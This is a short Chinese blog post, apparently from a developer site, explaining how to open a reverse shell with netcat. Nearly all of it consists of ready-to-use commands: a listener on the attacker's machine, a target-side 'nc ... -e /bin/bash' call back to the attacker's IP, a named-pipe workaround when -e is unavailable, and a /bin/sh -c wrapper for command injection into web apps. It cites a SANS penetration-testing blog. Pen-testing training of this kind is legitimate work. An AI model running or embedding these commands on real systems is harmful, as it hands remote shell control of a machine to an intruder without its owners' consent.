netcat反弹shell

注意:如果想要在小于1024的端口做监听,那么需要root权限
一)通用场合
1. 自己机器:nc —nvlp 443
2. 目标机:nc attacker'sIP 443 —e /bin/bash
-n:不解析域名 -v:显示连接信息 -l:处于监听状态 -p:端口号(有时需要单独把-p选项拿出来)

二)如果不支持-e选项:如果代码编译的时候没有指定GAPING_SECURITY_HOLE,那么将不会支持-e选项。
1. nc —nvlp 443
2. 目标机:
victim$ mknod /tmp/backpipe p
victim$ /bin/sh 0</tmp/backpipe | nc pentestbox 443 1>/tmp/backpipe
通过mknod创建一个命名管道(FIFO)backpipe,p指定管道类型。相应的我们可以使用mkfifo来创建一个命名管道,这样可以省略p选项。大多数shell可以省略 0<和1>,但是有些诡异的shell,必须使用0<和1>。

三)如果可以注入命令,但是没有shell(有时这种状况出现在一些web app),这时需要自己调用/bin/shell,然后使用-c参数来调用命令(另一个shell),然后重定向到netcat。通过如下命令注入。
/bin/sh —c "/bin/sh 0</tmp/backpipe | nc pentestbox 443 1>/tmp/backpipe"

http://pen-testing.sans.org/blog/pen-testing/2013/05/06/netcat-without-e-no-problem
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值